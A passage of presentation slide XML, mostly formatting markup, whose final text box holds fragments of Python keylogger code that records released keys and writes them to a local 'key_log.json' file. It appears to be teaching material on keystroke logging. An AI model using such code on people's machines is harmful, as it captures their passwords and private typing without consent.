              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Google Shape;164;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608200" cy="507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on_release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on_release(key):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flag, keys_used, keys</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keys_used.append(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{'Released': f'{key}'}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if flag == True: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flag = False</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 = keys + str(key)</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generate_json_file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generate_json_file(keys_used):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with open('key_log.json', '+wb') as key_log:</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key_list_bytes = json.dumps(keys_used).encode()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key_log.write(key_list_bytes)</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